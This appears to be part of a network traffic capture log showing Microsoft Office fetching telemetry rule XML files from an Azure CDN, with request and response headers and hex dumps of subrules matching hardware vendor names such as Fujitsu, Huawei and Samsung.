                                2024-12-03 16:51:17 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                23192.168.2.54999013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:17 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:17 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:17 GMT
                                Content-Type: text/xml
                                Content-Length: 464
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                ETag: "0x8DC582B97FB6C3C"
                                x-ms-request-id: 0e02d283-301e-000c-5b32-44323f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165117Z-174f7845968psccphC1EWRuz9s00000016cg00000000pr5d
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:17 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                Session IDSource IPSource PortDestination IPDestination Port
                                24192.168.2.54999113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:17 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:17 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:17 GMT
                                Content-Type: text/xml
                                Content-Length: 494
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                ETag: "0x8DC582BB7010D66"
                                x-ms-request-id: 1f40cf70-d01e-0014-6550-41ed58000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165117Z-174f7845968vqt9xhC1EWRgten000000166000000000q1ns
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:17 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                25192.168.2.54999213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:18 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:19 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:19 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                ETag: "0x8DC582B9748630E"
                                x-ms-request-id: e044a7be-f01e-003c-0c76-438cf0000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165119Z-174f784596886s2bhC1EWR743w00000016b0000000001s6c
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:19 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session IDSource IPSource PortDestination IPDestination Port
                                26192.168.2.54999313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:19 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:19 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:19 GMT
                                Content-Type: text/xml
                                Content-Length: 472
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                ETag: "0x8DC582B9DACDF62"
                                x-ms-request-id: 264c510b-001e-000b-0eb2-4215a7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165119Z-174f7845968kvnqxhC1EWRmf3g0000000syg00000000n63s
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:19 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                27192.168.2.54999413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:19 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:19 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:19 GMT
                                Content-Type: text/xml
                                Content-Length: 404
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                ETag: "0x8DC582B9E8EE0F3"
                                x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165119Z-174f78459688l8rvhC1EWRtzr00000000kt000000000gdg4
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:19 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                Session IDSource IPSource PortDestination IPDestination Port
                                28192.168.2.54999613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:20 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:20 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:20 GMT
                                Content-Type: text/xml
                                Content-Length: 468
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                ETag: "0x8DC582B9C8E04C8"
                                x-ms-request-id: 5181e575-b01e-001e-206f-430214000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165120Z-174f784596886s2bhC1EWR743w000000164000000000uub1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:20 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                29192.168.2.54999513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:20 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:20 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:20 GMT
                                Content-Type: text/xml
                                Content-Length: 428
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                ETag: "0x8DC582BAC4F34CA"
                                x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165120Z-174f7845968cpnpfhC1EWR3afc00000015s000000000qq7k
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:20 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                Session IDSource IPSource PortDestination IPDestination Port
                                30192.168.2.54999713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:21 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:21 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:21 GMT
                                Content-Type: text/xml
                                Content-Length: 499
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                ETag: "0x8DC582B98CEC9F6"
                                x-ms-request-id: 98fcde7c-201e-0096-4eef-44ace6000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165121Z-174f7845968n2hr8hC1EWR9cag00000015wg000000008uae
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:21 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                31192.168.2.54999813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:21 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:21 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:21 GMT
                                Content-Type: text/xml
                                Content-Length: 415
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                ETag: "0x8DC582B988EBD12"
                                x-ms-request-id: 5aec2b48-201e-0085-7d6b-4334e3000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165121Z-174f7845968jrjrxhC1EWRmmrs000000168g00000000pa15
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                Session IDSource IPSource PortDestination IPDestination Port
                                32192.168.2.54999913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:21 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:22 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:22 GMT
                                Content-Type: text/xml
                                Content-Length: 471
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                ETag: "0x8DC582BB5815C4C"
                                x-ms-request-id: e7678828-401e-0078-7a85-434d34000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165122Z-174f7845968px8v7hC1EWR08ng00000016f000000000dcme
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:22 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                33192.168.2.55000013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:22 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:22 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:22 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                ETag: "0x8DC582BB32BB5CB"
                                x-ms-request-id: 2132beec-901e-00ac-46aa-42b69e000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165122Z-174f78459685m244hC1EWRgp2c000000160000000000k5p5
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session IDSource IPSource PortDestination IPDestination Port
